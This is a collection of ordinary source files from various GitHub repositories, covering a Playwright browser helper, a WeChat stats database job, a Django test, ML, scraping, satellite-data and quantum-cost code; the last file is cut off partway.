+{"seq_id":"2398130070","text":"\"\"\"Instantiate a playwright chrominium browser.\n\nRespect PWBROWSER_ environ variables in .env\n\"\"\"\n#\n\nfrom typing import Union, Optional\n\n# from playwright.async_api import async_playwright, Browser\nfrom playwright.sync_api import sync_playwright, Browser\nfrom get_pwbrowser.config import Settings\n\nimport logzero\nfrom logzero import logger\n\nconfig = Settings()\nHEADLESS = not config.headful\nDEBUG = config.debug\nPROXY = config.proxy\n\n\n# fmt: off\ndef get_pwbrowser(\n headless: bool = HEADLESS,\n verbose: Union[bool, int] = DEBUG,\n proxy: Optional[Union[str, dict]] = PROXY,\n **kwargs\n) -> Browser:\n # fmt: on\n \"\"\"Instantiate a playwright chrominium browser (sync).\n\n mainly for scraping google translate where a page is reused\n hence, the sync version of get_pwbrowser makes more sense\n\n if isinstance(verbose, bool):\n verbose = 10 if verbose else 20\n logzero.loglevel(verbose)\n\n browser = get_browser(headless)\n context = browser.newContext()\n page = context.newPage()\n page.goto('https://httpbin.org/ip') https://httpbin.org/ip\n # https://getfoxyproxy.org/geoip/\n # http://whatsmyuseragent.org/\n https://playwright.dev/python/docs/intro/\n\n proxy setup: https://playwright.dev/python/docs/network?_highlight=proxy#http-proxy\n browser = chromium.launch(proxy={\n \"server\": \"http://myproxy.com:3128\",\n \"user\": \"usr\",\n \"password\": \"pwd\"\n })\n https://scrapingant.com/blog/how-to-use-a-proxy-in-playwright\n chrominium\n const launchOptions = {\n args: [ '--proxy-server=http://222.165.235.2:80' ]\n };\n browser = await playwright['chromium'].launch(launchOptions)\n\n os.environ['PWBROWSER_HEADFUL'] = 'true'\n\n headless: bool = HEADLESS\n headless: bool = False\n verbose: Union[bool, int] = DEBUG\n proxy: Optional[Union[str, dict]] = PROXY\n kwargs = {}\n \"\"\"\n if isinstance(verbose, bool):\n verbose = 10 if verbose else 20\n logzero.loglevel(verbose)\n\n kwargs.update({\n \"headless\": headless,\n })\n\n if proxy:\n proxy = {\"server\": proxy}\n kwargs.update({\n \"proxy\": proxy,\n })\n\n try:\n playwright = sync_playwright().start()\n except Exception as exc:\n logger.error(exc)\n raise\n\n try:\n browser = playwright.chromium.launch(**kwargs)\n # browser = playwright.chromium.launch(headless=False)\n except Exception as exc:\n logger.error(exc)\n raise\n\n return browser\n","repo_name":"ffreemt/get-pwbrowser","sub_path":"get_pwbrowser/get_pwbrowser.py","file_name":"get_pwbrowser.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1285755798","text":"from utils.my_mysql_add import MySql\r\nfrom settings import mysql_info, run_time\r\nimport time\r\nfrom datetime import datetime, timedelta\r\nfrom get_ci_data import *\r\nfrom loguru import logger\r\n\r\nfrom apscheduler.schedulers.background import BlockingScheduler\r\n\r\n\r\ncoon = MySql()\r\n__coon = MySql(mysql_info, 'sys_pinghu_wx_article_info')\r\n\r\n\r\ndef select_wx_content(news_id):\r\n datetime_yestoday = (datetime.now() - timedelta(days=4)).strftime('%Y-%m-%d')\r\n datetime_now = datetime.now().strftime('%Y-%m-%d')\r\n # sql = f\"\"\"-- select title, url, sn, idx, read_count, look_count, good_count, news_time from sys_wx_contents_temp where news_id={news_id} and create_time BETWEEN '{datetime_yestoday} 00:00:00' and '{datetime_now} 00:00:00' \"\"\"\r\n sql = f\"\"\"select title, url, sn, idx, read_count, look_count, good_count, news_time from sys_wx_contents_temp where news_id={news_id} and create_time BETWEEN '{datetime_yestoday} 00:00:00' and '{datetime_now} 00:00:00' \"\"\"\r\n results = coon.getAll(sql)\r\n # print(333333,results)\r\n return results\r\n\r\n\r\n# def select_pinghu_wx_info(sn):\r\n# sql = f\"\"\"select read_count, looking_count, good_count, wci from sys_pinghu_wx_info where article_id={sn} order by create_time desc limit 1\"\"\"\r\n# result = __coon.getOne(sql)\r\n# return result\r\n\r\ndef select_pinghu_wx_info(sn):\r\n sql = f\"\"\"select read_count, looking_count, good_count, wci from sys_pinghu_wx_article_info where article_id='{sn}' order by create_time desc limit 1\"\"\"\r\n result = __coon.getOne(sql)\r\n # print(6666,result)\r\n return result\r\n\r\n\r\ndef select_best(news_id, yesterday_start_time, yesterday_end_time):\r\n sql = f\"\"\"select news_id from sys_pinghu_wx_article_info where news_id ={news_id} and create_time BETWEEN {yesterday_start_time} and {yesterday_end_time} \"\"\"\r\n results = __coon.getOne(sql)\r\n return results\r\n\r\n\r\n\r\ndef change_(item):\r\n keys_ = item.keys()\r\n for i in keys_:\r\n if item[i] == None:\r\n item[i] = 0\r\n return item\r\n\r\n\r\ndef pinghu_start():\r\n spider_data, spider_yestoday_data, yesterday_start_time, yesterday_end_time = run_time()\r\n\r\n pinghu_id_list = ['1149', '1150', '1151', '1152', '1153', '1154', '1155', '1156', '1157', '1158', '1159', '1160',\r\n '1161', '1162', '1163', '1164', '1165', '1166', '1167', '1168', '1169', '1170', '1171', '1172',\r\n '1173', '1174', '1175', '1176', '1177', '1178', '1179', '1180', '1181', '1182', '1183', '1184',\r\n '1185', '1186', '1187', '1188', '1189', '1190', '1191', '1192', '1193', '1194', '1195', '1196',\r\n '1197', '1198', '1199', '1200', '1201', '1202', '1203', '1204', '1205', '1206', '1207', '1208',\r\n '1209', '1210', '1211', '1212', '1213']\r\n for pinghu_id in pinghu_id_list:\r\n # print(1111,pinghu_id)\r\n results_data = select_wx_content(pinghu_id)\r\n if select_best(pinghu_id, yesterday_start_time, yesterday_end_time):\r\n __coon.delete(pinghu_id, yesterday_start_time, yesterday_end_time)\r\n logger.info('更新完成')\r\n # print(22222,results_data)\r\n if results_data:\r\n for result_data in results_data:\r\n # print(55555,result_data)\r\n item = dict()\r\n title, url, sn, idx, read_count, look_count, good_count, news_time = result_data\r\n item[\"news_id\"] = pinghu_id\r\n item[\"article_id\"] = sn\r\n item[\"read_count\"] = read_count\r\n item[\"good_count\"] = good_count\r\n item[\"looking_count\"] = look_count\r\n item[\"adapter_type\"] = 'ls'\r\n item[\"create_time\"] = int(time.time() * 1000)\r\n item[\"title\"] = title\r\n item[\"url\"] = url\r\n item[\"news_time\"] = news_time\r\n if idx == 1:\r\n item['is_top'] = 1\r\n else:\r\n item['is_top'] = 0\r\n best_data = select_pinghu_wx_info(sn)\r\n change_(item)\r\n if best_data:\r\n old_read_count, old_looking_count, old_good_count, wci = best_data\r\n item[\"read_count_change\"] = read_count - old_read_count\r\n item[\"good_count_change\"] = good_count - old_good_count\r\n item[\"looking_count_change\"] = look_count - old_looking_count\r\n item[\"wci\"] = get_wci_ph(item)\r\n item[\"wci_change\"] = item[\"wci\"] - wci\r\n else:\r\n item[\"read_count_change\"] = 0\r\n item[\"good_count_change\"] = 0\r\n item[\"looking_count_change\"] = 0\r\n item[\"wci\"] = get_wci_ph(item)\r\n item[\"wci_change\"] = 0\r\n # print(item)\r\n __coon.insert(item)\r\n # return item\r\n\r\n\r\nif __name__ == '__main__':\r\n print(4444)\r\n pinghu_start()\r\n\r\n scheduler = BlockingScheduler(timezone='Asia/Shanghai')\r\n scheduler.add_job(pinghu_start, 'cron', hour='9', minute='30')\r\n scheduler.add_job(pinghu_start, 'cron', hour='14', minute='30')\r\n scheduler.start()\r\n","repo_name":"2783785013/-","sub_path":"dy_wb_wx/PingHu_wx.py","file_name":"PingHu_wx.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70032883245","text":"from django.utils.functional import Promise\n\nfrom django.conf import settings\n\nfrom django.test import SimpleTestCase\nfrom jaad.exceptions import exception_handler\nfrom rest_framework.exceptions import ValidationError\n\n\nclass RendererTests(SimpleTestCase):\n maxDiff = None\n\n def test_that_exception_handler_handle_unexpected_exception(self):\n exception = KeyError(\"Bad key detected\")\n\n handled_exception = self.handle_exception(exception, None, debug_value=False)\n\n self.assertEqual(\n {\n \"status_code\": 500,\n \"message\": \"An internal error occurred.\",\n \"more_info\": \"Contact the administrator of the application.\",\n },\n handled_exception.data,\n )\n self.assertEqual(500, handled_exception.status_code)\n\n def test_that_exception_handler_handle_expected_exception(self):\n exception = ValidationError(detail=\"Bad format for the field name\")\n\n response_for_exception = self.handle_exception(\n exception, None, debug_value=False\n )\n\n self.assertEqual(\n {\n \"status_code\": 400,\n \"message\": \"Invalid input.\",\n \"more_info\": [\"Bad format for the field name\"],\n },\n self.get_proxied_value(response_for_exception.data),\n )\n self.assertEqual(400, response_for_exception.status_code)\n\n def handle_exception(self, exception, context, debug_value):\n previous_debug_value = settings.DEBUG\n settings.DEBUG = debug_value\n returned_value = exception_handler(exception, context)\n settings.DEBUG = previous_debug_value\n return returned_value\n\n def get_proxied_value(self, some_dict):\n return {\n key: value._proxy____cast() if isinstance(value, Promise) else value\n for key, value in some_dict.items()\n }\n","repo_name":"AmadeusITGroup/jaad","sub_path":"jaad/tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44440379313","text":"from functools import partial\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.sparse as sp\nimport re\n\nimport pandas as pd\n\n\nclass HyperparameterExplorer:\n def __init__(self, X, y, classifier, score_name, primary_hyperparameter,\n validation_split=0.1, test_X=None, test_y=None,\n # only used for final training on all of the training data.\n assess_test_data_during_fitting=True,\n use_prev_best_weights=False):\n\n # check data\n assert X.shape[0] == y.shape[0]\n # Sometimes we check the loss of test_X and test_y during fitting\n if test_X is None and test_y is None:\n print(\"No test data was provided.\")\n if test_X is not None and test_y is not None:\n assert test_X.shape[0] == test_y.shape[0]\n\n # model_partial is a model that's missing one or more parameters.\n self.all_training_X = X # reserved for final training after hyper sweep.\n self.all_training_y = y # reserved for final training after hyper sweep.\n self.N, self.d = X.shape\n self.summary = pd.DataFrame()\n self.primary_hyperparameter = primary_hyperparameter\n\n # split off a validation set from X\n split_index = int(self.N*(1-validation_split))\n print(\"{} of {} points from training are reserved for \"\n \"validation\".format(self.N - split_index, self.N))\n self.train_X = X[0:split_index, :]\n self.validation_X = X[split_index:, :]\n self.train_y = y[0:split_index]\n self.validation_y = y[split_index:]\n print('variances of all training data: {}'.format(np.var(y)))\n print('variances of split-off training & validation '\n 'data: {}, {}'.format(np.var(self.train_y),\n np.var(self.validation_y)))\n\n if test_X is not None and test_y is not None:\n self.assess_test_data_during_fitting = assess_test_data_during_fitting\n self.test_X = test_X\n self.test_y = test_y\n self.model = partial(classifier,\n X=self.train_X, y=self.train_y,\n test_X=test_X, test_y=test_y)\n else:\n self.model = partial(classifier, X=self.train_X, y=self.train_y)\n\n # keep track of model numbers.\n self.num_models = 0\n self.models = {}\n\n # the score that will be used to determine which model is best.\n self.training_score_name = score_name\n self.score_name = re.sub(\"training\", \"\", score_name)\n self.validation_score_name = re.sub(\"training\", \"validation\", score_name)\n self.use_prev_best_weights = use_prev_best_weights\n\n def train_model(self, kernel_kwargs, model_kwargs, assess_test_data_during_fitting=False):\n # train model\n # check that model was made\n try:\n model_kwargs['assess_test_data_during_fitting'] = assess_test_data_during_fitting\n m = self.model(kernel_kwargs=kernel_kwargs, **model_kwargs)\n # set weights to the best found so far\n # Note: this is silly for non-iterative solvers like Ridge.\n if self.use_prev_best_weights and self.summary.shape[0] >=1:\n print('Starting with best weights from previous model(s)')\n best_weights = self.best('weights')\n if best_weights is not None:\n m.replace_weights(best_weights.copy())\n\n except NameError:\n print(\"model construction failed for {}\".format(**model_kwargs))\n\n self.num_models += 1\n self.model_number = self.num_models\n m.run()\n # save outcome of fit. Includes training data 0/1 loss, etc.\n self.models[self.num_models] = m\n print(\"saved as model # {}\".format(self.num_models))\n\n # Check if model converged, and assess it if so\n if m.converged:\n print(\"Model converged; assess it using validation data.\")\n\n # assess the model even if it didn't converge\n self.assess_model(m)\n print(\"Model training & assessment completed.\")\n\n def assess_model(self, model):\n m = model\n # get results\n outcome = m.results.tail(1).reset_index()\n if len(outcome) < 1:\n print(\"model didn't work..?\")\n # Save the model number for so we can look up the model later\n outcome['model number'] = [self.num_models]\n outcome['converged'] = [m.converged]\n print('{}:{}'.format(self.training_score_name,\n outcome[self.training_score_name][0]))\n\n validation_results = m.apply_model(X=self.validation_X,\n y=self.validation_y,\n data_name='validation')\n validation_results = pd.DataFrame(validation_results)\n v_columns = [c for c in validation_results.columns\n if 'validation' in c or self.primary_hyperparameter == c]\n outcome = pd.merge(pd.DataFrame(outcome),\n validation_results[v_columns])\n\n # Append this new model's findings onto the old model.\n self.summary = pd.concat([self.summary, outcome])\n # Oh, silly Pandas:\n self.summary.reset_index(drop=True, inplace=True)\n\n # Plot log loss vs time if applicable.\n try:\n m.plot_loss_normalized_and_eta()\n m.plot_W_hat_history()\n except:\n print(\"not all plotting calls worked.\")\n\n def best(self, value='model'):\n \"\"\"\n Find the best model according to the validation data\n via the Pandas DataFrame.\n\n :param value: a string describing what you want from the best model.\n \"\"\"\n # get the index of the model with the best score\n i = self.summary[[self.validation_score_name]].idxmin()[0]\n i = self.summary['model number'][i]\n if value == 'model number':\n return i\n\n summary_row = self.summary[self.summary['model number'] == i]\n if value == 'summary':\n return summary_row.T\n\n best_score = summary_row[self.validation_score_name]\n if value == 'score':\n return best_score\n\n model = self.models[i]\n if value == 'model':\n return model\n\n if value == 'weights':\n return model.get_weights()\n\n print(\"best {} = {}; found in model {}\".format(\n self.validation_score_name, best_score, i))\n return model\n\n def best_results_across_hyperparams(self):\n \"\"\"\n Group summary results by lambda and return a summary of the best\n validation score result for each lambda tested so far.\n \"\"\"\n if self.summary.shape[0] == 0:\n return None\n # best losses at each lambda:\n p = self.primary_hyperparameter\n idx = self.summary.groupby([p])[self.validation_score_name].\\\n transform(min) == self.summary[self.validation_score_name]\n return self.summary[idx]\n\n def plot_fits(self, df=None, x=None, y1=None, y2=None,\n filename=None, xlim=None, ylim=None, logx=False):\n if x is None:\n x = self.primary_hyperparameter\n if df is None:\n df = self.summary\n if y1 == None:\n y1 = self.validation_score_name\n if y2 == None:\n y2 = self.training_score_name\n fig, ax = plt.subplots(1, 1, figsize=(4, 3))\n plot_data = df.sort(x)\n if logx:\n plt.semilogx(plot_data[x], plot_data[y1],\n linestyle='--', marker='o', c='g')\n plt.semilogx(plot_data[x], plot_data[y2],\n linestyle='--', marker='o', c='grey')\n else:\n plt.plot(plot_data[x], plot_data[y1],\n linestyle='--', marker='o', c='g')\n plt.plot(plot_data[x], plot_data[y2],\n linestyle='--', marker='o', c='grey')\n\n plt.legend(loc='best')\n plt.xlabel(x)\n plt.ylabel(self.score_name)\n ax.axhline(y=0, color='k')\n if xlim:\n ax.set_xlim([xlim[0],xlim[1]])\n if ylim:\n ax.set_ylim([ylim[0],ylim[1]])\n\n plt.tight_layout()\n if filename is not None:\n fig.savefig(filename + '.pdf')\n\n def train_on_whole_training_set(self, max_epochs=None, delta_percent=None):\n # get the best model conditions from the hyperparameter exploration,\n # and print it to ensure the user's hyperparameters match the best\n # models's.:\n #print(\"best cross-validation model's info:\")\n #print(self.best('summary'))\n print(\"getting best model.\")\n # Reset model, but not the initial weights\n self.final_model = self.best('model').copy(reset=True)\n self.final_model.check_W_bar_fit_during_fitting = True\n self.final_model.assess_test_data_during_fitting =True\n\n print(\"replace X and Y before training on all the data\")\n # replace the smaller training sets with the whole training set.\n self.final_model.replace_X_and_y(self.all_training_X,\n self.all_training_y)\n if max_epochs is not None:\n self.final_model.max_epochs = max_epochs\n if delta_percent is not None:\n self.delta_percent = delta_percent\n\n print(\"fit the final model with all the training data\")\n # find the best weights using all the data\n self.final_model.run()\n assert self.final_model.W_bar is not None, \\\n \"Should have bar{W} for final model, so the test data is \" \\\n \"assessed using bar{W} instead of W.\"\n try:\n self.final_model.plot_loss_and_eta()\n self.final_model.plot_loss_of_both_W_arrays()\n except:\n print(\"not all the plotting worked for the model run with\"\n \"all of the training data\")\n\n print(\"Done training final model with all the training data.\")\n\n def evaluate_test_data(self):\n assert self.final_model.W_bar is not None, \\\n \"Should use bar{W} to evaluate test data\"\n\n test_results = self.final_model.apply_model(\n X=self.test_X, y=self.test_y, data_name=\"test\")\n print(pd.DataFrame(test_results).T)\n\n\n","repo_name":"JanetMatsen/Machine_Learning_CSE_546","sub_path":"HW3/code/hyperparameter_explorer.py","file_name":"hyperparameter_explorer.py","file_ext":"py","file_size_in_byte":10403,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"2025947054","text":"import scrapy\r\nfrom scrapy.loader import ItemLoader\r\nfrom pokemon_cards.items import PokemonSet\r\n\r\n\r\nclass PokemonSetsSpider(scrapy.Spider):\r\n # this spider collects the set name, release date and set abbreviation\r\n name = 'pokemon_sets'\r\n\r\n def start_requests(self):\r\n # This starts the web scraper at the correct website\r\n url = \"https://bulbapedia.bulbagarden.net/wiki/List_of_Pok%C3%A9mon_Trading_Card_Game_expansions\"\r\n yield scrapy.Request(url=url, callback=self.parse_pokemon_sets)\r\n\r\n def parse_pokemon_sets(self, response):\r\n # this collects all set info in the table using xpath and stores them in the item loader\r\n set_name = response.xpath(\"//tr[1]//td[ 4]/a/text()\").getall()\r\n set_date = response.xpath(\"//tr[1]//td[ 8]/text()\").getall()\r\n set_date = [str(d).strip() for d in set_date]\r\n set_abbreviation = response.xpath(\"//tr[1]//td[ 10]/text()\").getall()\r\n set_abbreviation = [str(s).strip() for s in set_abbreviation]\r\n loader = ItemLoader(PokemonSet(), response)\r\n loader.add_value('set_name', set_name)\r\n loader.add_value('set_date', set_date)\r\n loader.add_value('set_abbreviation', set_abbreviation)\r\n yield loader.load_item()\r\n","repo_name":"JonathanWamsley/pokemon_cards_project","sub_path":"data_extracting/pokemon_cards/pokemon_cards/spiders/pokemon_sets_spider.py","file_name":"pokemon_sets_spider.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11171885184","text":"import xarray as xr\nimport xesmf as xe\nimport numpy as np\nfrom tqdm import tqdm\nfrom datetime import datetime\n\npathOut = \"~/data/MODIS/output\"\npathOut = os.path.expanduser(pathOut)\n\nkeep_vars = [\n 'NDVI',\n 'NIRv',\n 'Nadir_Reflectance_Band1',\n 'Nadir_Reflectance_Band2',\n 'Nadir_Reflectance_Band3',\n 'Nadir_Reflectance_Band4',\n 'Nadir_Reflectance_Band5',\n 'Nadir_Reflectance_Band6',\n 'Nadir_Reflectance_Band7',\n 'crs',\n 'kNDVI'\n]\n\ndates_2000 = np.arange(np.datetime64(\"2000-01-05\"), np.datetime64(\"2000-12-31\"), np.timedelta64(8, \"D\")).astype(\"datetime64[ns]\")\n\ndataset = xr.open_zarr(f\"{pathOut}/modis-mcd43c4-vis-256x256x256.zarr\")\n\ndataset = dataset[keep_vars]\n\nlast_year = 2021\nfirst_year = np.datetime64(dataset.time_coverage_start).astype(\"datetime64[Y]\").astype(str).astype(int)\n\nyears = np.arange(first_year,last_year + 1)\n\ndef resample_weekly(ds,year):\n keep_attrs = ds.time.attrs\n ds = ds.sel(time=slice(f\"{year}-01-01\",f\"{year}-12-31\")).resample(time=\"8D\").mean() \n ds['time'] = ds.time + np.timedelta64(4,\"D\")\n ds.time.attrs = keep_attrs\n if year==2000:\n ds = ds.interp(coords=dict(time=dates_2000))\n return ds\n\ndataset_8d = [resample_weekly(dataset,year) for year in tqdm(years)]\ndataset_8d = xr.concat(dataset_8d,dim=\"time\")\n\ndataset_8d['crs'] = dataset['crs']\n\ndataset_8d.attrs['date_modified'] = str(datetime.now())\ndataset_8d.attrs['time_coverage_end'] = str(dataset_8d.time[-1].values)\ndataset_8d.attrs['time_coverage_start'] = str(dataset_8d.time[0].values)\ndataset_8d.attrs['temporal_resolution'] = \"8D\"\ndataset_8d.attrs['time_period'] = \"8D\"\ndataset_8d.attrs['reported_day'] = 5.0\ndataset_8d.attrs['processing_steps'] = dataset_8d.attrs['processing_steps'] + ['resampling by 8-day mean']\n\ndataset_8d = dataset_8d.chunk(dict(time=256,lat=128,lon=128))\ndataset_8d.attrs['id'] = \"256x128x128\"\n\ndataset_8d.to_zarr(f\"{pathOut}/modis-mcd43c4-vis-8d-0.05deg-256x128x128.zarr\")","repo_name":"deepesdl/cube-gen","sub_path":"ESDC/inputs-preprocess/MODIS/modis-mcd43c4-data-cube-8d.py","file_name":"modis-mcd43c4-data-cube-8d.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27795148895","text":"from animal_generator.models.neuron import Neuron\nfrom animal_generator.models.synapse import Synapse\nfrom animal_generator.services.brain.brain_computer import BrainComputer\n\n\nclass Brain:\n def __init__(self, animal, raw_neurons, raw_synapses):\n self.animal = animal\n self.neurons = self.generate_neurons(raw_neurons)\n self.synapses = self.generate_synapses(raw_synapses)\n self.computer = BrainComputer(self)\n self.clean()\n\n def clean(self):\n from animal_generator.services.brain.brain_cleaner import BrainCleaner\n\n BrainCleaner(self).run()\n\n def get_neuron_by_id(self, neuron_id):\n for neuron in self.neurons:\n if neuron.id == neuron_id:\n return neuron\n raise BrainException(f\"Neuron with id: {neuron_id} does not exist\")\n\n def get_neurons_by_layer(self, layer_number):\n neurons_at_layer = list(\n filter(\n lambda neuron: neuron.layer == layer_number,\n self.neurons\n )\n )\n if len(neurons_at_layer) == 0:\n raise BrainException(f\"No neuron at layer: {layer_number}\")\n return neurons_at_layer\n\n def get_synapse_by_output_id(self, output_id):\n synapses_with_output = list(\n filter(\n lambda synapse: synapse.output == output_id,\n self.synapses\n )\n )\n return synapses_with_output\n\n @staticmethod\n def generate_neurons(raw_neurons):\n neurons = []\n for raw_neuron in raw_neurons:\n neurons.append(Neuron(raw_neuron))\n return neurons\n\n @staticmethod\n def generate_synapses(raw_synapses):\n synapses = []\n for raw_synapse in raw_synapses:\n synapses.append(Synapse(raw_synapse))\n return synapses\n\n def reset_scores(self):\n for neuron in self.neurons:\n neuron.reset_score()\n\n def compute(self, other_animal):\n self.computer.compute_brain(other_animal)\n return self.computer.result\n\n\nclass BrainException(Exception):\n \"\"\"All Brain Exceptions\"\"\"\n","repo_name":"NicolleLouis/animal_generator","sub_path":"animal_generator/models/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"63597262","text":"import numpy as np\nfrom scipy.optimize import minimize, NonlinearConstraint\n\nimport trotter_based_methods\nimport taylor_based_methods\nimport plane_waves_methods\nimport qrom_methods\nimport interaction_picture\n\nclass Cost_calculator:\n\n def __init__(self, molecule, tools, molecule_info_type):\n\n self.molecule = molecule\n self.tools = tools\n self.molecule_info_type = molecule_info_type\n self.costs = {'qdrift': [],\n 'rand_ham': [],\n 'taylor_naive': [],\n 'taylor_on_the_fly': [],\n 'configuration_interaction': [],\n 'low_depth_trotter': [],\n 'shc_trotter': [],\n 'low_depth_taylor': [],\n 'low_depth_taylor_on_the_fly': [],\n 'linear_t': [],\n 'sparsity_low_rank': [],\n 'interaction_picture': []\n }\n self.basis = self.tools.config_variables['basis']\n self.runs = self.tools.config_variables['runs']\n self.p_fail = self.tools.config_variables['p_fail']\n\n def calculate_cost(self, method): \n\n if self.molecule_info_type == 'name':\n \n json_name = str(self.molecule.molecule_info)+ '_' + str(self.basis)\n self.molecule.load(json_name = 'parameters/'+json_name+'_'+str(self.tools.config_variables['gauss2plane_overhead']))\n\n if method == 'qdrift' or method == 'rand_ham':\n\n methods_trotter = trotter_based_methods.Trotter_based_methods(self.tools)\n\n # calculate the basis of the molecule (and its parameters)\n if not hasattr(self.molecule, 'lambda_value') or not hasattr(self.molecule, 'Lambda_value') or not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Gamma'):\n self.molecule.get_basic_parameters()\n\n if method == 'qdrift': \n \n lambda_value = self.molecule.lambda_value\n arguments = (self.p_fail, lambda_value)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_trotter.calc_qdrift_resources, arguments)\n \n \n self.costs['qdrift'] += [methods_trotter.calc_qdrift_resources(\n optimized_errors.x,\n self.p_fail,\n lambda_value)]\n\n elif method == 'rand_ham': \n\n Lambda_value = self.molecule.Lambda_value\n Gamma = self.molecule.Gamma\n\n arguments = (self.p_fail, Lambda_value, Gamma)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_trotter.calc_rand_ham_resources, arguments)\n \n self.costs['rand_ham'] += [methods_trotter.calc_rand_ham_resources(\n optimized_errors.x,\n self.p_fail,\n Lambda_value,\n Gamma)]\n \n elif method == 'taylor_naive' or method == 'taylor_on_the_fly' or method == 'configuration_interaction':\n\n methods_taylor = taylor_based_methods.Taylor_based_methods(self.tools)\n\n # calculate the basis of the molecule (and its parameters)\n if not hasattr(self.molecule, 'lambda_value') or not hasattr(self.molecule, 'Lambda_value') or not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Gamma'):\n self.molecule.get_basic_parameters()\n\n lambda_value = self.molecule.lambda_value\n Lambda_value = self.molecule.Lambda_value\n Gamma = self.molecule.Gamma\n N = self.molecule.N\n\n if method == 'taylor_naive':\n\n arguments = (self.p_fail, lambda_value, Gamma, N)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_taylor.taylor_naive, arguments)\n\n self.costs['taylor_naive'] += [methods_taylor.taylor_naive(\n optimized_errors.x,\n self.p_fail,\n lambda_value,\n Gamma,\n N)]\n\n\n elif method == 'taylor_on_the_fly':\n\n if not hasattr(self.molecule, 'phi_max') or not hasattr(self.molecule, 'dphi_max'):\n self.molecule.molecular_orbital_parameters()\n if not hasattr(self.molecule, 'zeta_max_i'):\n self.molecule.calculate_zeta_max_i()\n\n zeta_max_i = self.molecule.zeta_max_i\n phi_max = self.molecule.phi_max\n dphi_max = self.molecule.dphi_max\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n arguments = (self.p_fail, N, Gamma, phi_max, dphi_max, zeta_max_i, J)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S, eps_H, eps_taylor\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(5, methods_taylor.taylor_on_the_fly, arguments)\n\n self.costs['taylor_on_the_fly'] += [methods_taylor.taylor_on_the_fly(\n optimized_errors.x,\n self.p_fail,\n N,\n Gamma,\n phi_max,\n dphi_max,\n zeta_max_i,\n J)]\n \n elif method == 'configuration_interaction':\n if not hasattr(self.molecule, 'phi_max') or not hasattr(self.molecule, 'grad_max') or not hasattr(self.molecule, 'lapl_max'):\n self.molecule.molecular_orbital_parameters()\n if not hasattr(self.molecule, 'alpha'):\n self.molecule.min_alpha()\n if not hasattr(self.molecule, 'zeta_max_i'):\n self.molecule.calculate_zeta_max_i()\n\n N = self.molecule.N # computed from initialising the molecule\n x_max = 1 # Default units are Angstroms. See https://en.wikipedia.org/wiki/Atomic_radius and https://en.wikipedia.org/wiki/Atomic_radii_of_the_elements_(data_page)\n phi_max = self.molecule.phi_max\n alpha = self.molecule.alpha\n eta = self.molecule.eta\n zeta_max_i = self.molecule.zeta_max_i\n\n gamma1 = self.molecule.grad_max * x_max / self.molecule.phi_max\n gamma2 = self.molecule.lapl_max * x_max**2 / self.molecule.phi_max\n\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n arguments = (self.p_fail, N, eta, alpha, gamma1, gamma2, zeta_max_i, phi_max, J)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S, eps_H, eps_taylor\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(5, methods_taylor.configuration_interaction, arguments)\n\n # alpha, gamma1, gamma2 are used to calculate K0, K1, K2 (see eq D14 in overleaf)\n self.costs['configuration_interaction'] += [methods_taylor.configuration_interaction(\n optimized_errors.x,\n self.p_fail,\n N,\n eta, \n alpha,\n gamma1,\n gamma2,\n zeta_max_i,\n phi_max,\n J)]\n\n \n elif method == 'low_depth_trotter' or method == 'low_depth_taylor' or method == 'low_depth_taylor_on_the_fly' or method == 'shc_trotter':\n methods_plane_waves = plane_waves_methods.Plane_waves_methods(self.tools)\n\n # This methods are plane waves, so instead of calling self.molecule.get_basic_parameters() one should call self.molecule.build_grid()\n # grid_length is the only parameter of build_grid. Should be calculated such that the number of basis functions\n # is ~= 100*self.molecule_data.n_orbitals. grid_length ~= int(np.cbrt(100*self.molecule.molecule_data.n_orbitals * 2))\n # Omega is returned by self.molecule.build_grid()\n # J = len(self.molecule.geometry) #is the number of atoms in the molecule\n\n if method == 'low_depth_trotter':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Omega') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Omega = self.molecule.Omega\n\n arguments = (self.p_fail, N_grid, eta, Omega)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_plane_waves.low_depth_trotter, arguments)\n\n self.costs['low_depth_trotter'] += [methods_plane_waves.low_depth_trotter(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta, \n Omega)]\n\n elif method == 'shc_trotter':\n\n grid_length = 